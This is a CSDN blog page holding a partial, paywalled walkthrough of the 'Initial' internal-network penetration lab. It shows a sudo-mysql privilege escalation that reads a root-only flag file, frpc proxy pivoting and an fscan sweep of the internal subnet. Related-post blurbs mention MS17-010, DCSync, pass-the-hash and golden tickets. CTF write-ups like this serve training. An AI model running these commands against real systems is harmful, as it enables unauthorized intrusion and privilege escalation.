春秋云境—Initial

已于 2023-07-17 15:35:04 修改
阅读量2k 收藏 1
点赞数
分类专栏: 春秋云境 文章标签: 网络安全 web安全
于 2023-07-15 14:16:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/131738699
版权
本文详细介绍了春秋云境—Initial靶场的内网渗透过程,从WEB渗透开始,包括ThinkPHP RCE的检测与利用,蚁剑连接,sudo提权,frpc代理和fsacn扫描。接着深入后渗透阶段,讲解了信呼OA RCE的1.php木马和exp.py漏洞利用,以及永恒之蓝和DCSync技术,包括DCSync的原理、导出域内用户Hash、生成与导入黄金票据等关键步骤。
摘要由CSDN通过智能技术生成

文章目录

春秋云境—Initial

一、前期准备
1、靶标介绍

Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。

2、相关设备
设备名称 IP地址
Web 39.98.120.156
172.22.1.15
XIAORANG-OA01 172.22.1.18
XIAORANG-WIN7 172.22.1.21
DC01 172.22.1.2
二、WEB渗透
1、ThinkPHP RCE
(1)、打开网站
http://39.98.120.156/

在这里插入图片描述

(2)、检测漏洞

在这里插入图片描述

2、蚁剑连接

在这里插入图片描述
在这里插入图片描述

3、sudo提权
(www-data:/tmp) $ sudo -l
(www-data:/tmp) $ sudo mysql -e '\! cat /root/flag/flag01.txt'

在这里插入图片描述

4、frpc代理
(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod +x frpc*
(www-data:/tmp) $ ./frpc -c ./frpc.ini
5、fsacn扫描
(www-data:/var/www/html) $ cd /tmp/
(www-data:/tmp) $ chmod +x fscan
(www-data:/tmp) $ ./fscan -h 172.22.1.0/24

172.22.1.2:445 open
172.22.1.2:135 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.18:80
最低0.47元/天 解锁文章
liebe1*1
关注
专栏目录
ichunqiu云境 - Delegation Writeup
WUfagg的博客
12-10 923
一场内网渗透
春秋云镜-Initial-Writeup
qq_35607078的博客
07-11 1222
春秋运镜-Initial-Writeup
【内网渗透】最保姆级的春秋云镜Initial打靶笔记
uuzeray的博客
08-20 751
永恒之蓝打了之后本身就是SYSTEM权限,可以mimikatz搜集域内用户hash。在打DC前先打172.22.1.21 MS17-010永恒之蓝。拿到第一个flag,提示下一个flag在内网服务器。先上传或者wget下载frpc和frpc.ini。suid没有可利用的提权命令,打sudo提权。再用crackmapexec打PTH拿下域控。172.22.1.18 信呼OA系统。先给msf所在机配一下socks5代理。这个一般直接拿kali的msf打就行。然后就能直接浏览器里访问内网服务。
春秋云境Initial WP
m0_62466350的博客
12-05 1178
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
春秋云镜-【仿真场景】Initial writeup
渗透测试研究中心
03-07 1278
开启靶机后是一个带着 ThinkPHP icon 的登陆界面,直接测试一下存在 5.0.23 RCE打一下,PHP-7.4.3 的环境,看一下 disable_functionspcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifco...
春秋云镜靶场Initial-WriteUP 专业徽章手把手教学
qq_45234543的博客
11-17 4024
春秋云镜靶场Initial-WP,专业徽章,完整flag获取教程
春秋云境Initial-WP(附带详细代理过程)
weixin_63576152的博客
10-01 563
用Thinkphpgui查找漏洞(一开始因为工具版本问题,一直不能getshell,心疼我的小砂砾),得到木马网址和密码。flag02在C://Users/Administrator/flag/flag02.txt中。fscan扫描172.22.1.0/24,结果默认保存在同目录下的result.txt中。利用frp和proxifier代理,可以访问到172.22.1.18(frp代理过程。用crackmapexec去进行hash传递攻击,使得我们可以访问到DC上的文件。
[春秋云境]Initial
weixin_73307794的博客
08-06 335
春秋云境!启动!
Ichunqiu云境 —— Tsclient Writeup
WUfagg的博客
12-12 803
MSSQL,Privilege Escalation,Kerberos,域渗透,RDP
MySQL:reading initial communication packet问题解决方法
09-11
网站访问出现如题错误,经过检查my.cnf,发现innodb_buffer_pool_size = 2048M 设置过大,调整为innodb_buffer_pool_size = 1024M即可,网上也有该问题的其他解决方法,但都不能解决我的问题
【原创】Ichunqiu云境 —— Endless(无间计划) Writeup
WUfagg的博客
03-21 877
Author:小离-xiaoli。
春秋云镜initial
最新发布
ULGANOY的博客
08-30 1568
春秋云镜initial的record
靶场练习--春秋云境-Certify
NoooEmotion的博客
01-28 1876
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
i春秋云镜Initial
weixin_65550121的博客
12-15 619
参考文章:https://blog.csdn.net/solitudi/article/details/118675321。flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6} 最终flag。紧接着在fscan中可以看到存在一个ms17-010的机器,也就是172.22.1.21。通过Fscan进行扫描发现存在Thinkphp RCE漏洞。我们进行getshell之后通过蚁剑进行连接。紧接着通过MSF打MS17-010。然后我们通过蚁剑挂代理进行连接。
[春秋云镜] Initial
m0_73649671的博客
06-03 484
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
春秋云境:CVE-2022-24124
一只爱吃橙子的羊
12-02 2606
Casdoor是开源的一个身份和访问管理 (IAM) / 单点登录 (SSO) 平台,带有支持 OAuth 2.0 / OIDC 和 SAML 身份验证的 Web UI 。 Casdoor 1.13.1 之前存在安全漏洞,该漏洞允许攻击者通过api/get-organizations进行攻击。
春秋云境:CVE-2022-25411
一只爱吃橙子的羊
12-01 1758
MaxSite CMS是俄国MaxSite CMS开源项目的一款网站内容管理系统。马克斯程序(MaxCMS)以开源、免费、功能强大、安全健壮、性能卓越、超级易用、模板众多、插件齐全等优势,受到众多企业和站长的喜爱。马克斯程序研发团队拥有多年的技术积累和产品开发经验,成立了官方技术支持团队、官方模板团队、官方插件团队。一切立足于站长利益、孜孜不倦的挖掘站长需求、不断提升产品体验,自主创新多项特色技术、提升网站品质!独立开发的管理员管理系统,可以对管理员进行更能人性化的管理网站。 Maxsite CMS存在文件
verilog initial
08-14
Verilog `initial` is a keyword used to define a block of code that will be executed once at the beginning of the simulation. It is commonly used to initialize variables and perform any necessary setup tasks before the main simulation starts. The `initial` block runs concurrently with other procedural blocks in the design. Here's an example of how `initial` is used in Verilog: ```verilog module Example; reg clk; reg [7:0] count; initial begin clk = 0; count = 0; #10; // wait for 10 time units while(count < 8) begin #5; // wait for 5 time units count = count + 1; end $finish; // end simulation end always begin #1; // wait for 1 time unit clk = ~clk; end endmodule ``` In this example, the `initial` block initializes the `clk` and `count` variables. It then waits for 10 time units before entering a loop that increments `count` by 1 every 5 time units. Once `count` reaches 8, the simulation is ended using the `$finish` system function. The `always` block toggles the `clk` signal every 1 time unit. Note that `initial` blocks are not synthesizable and are only used for simulation purposes.
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值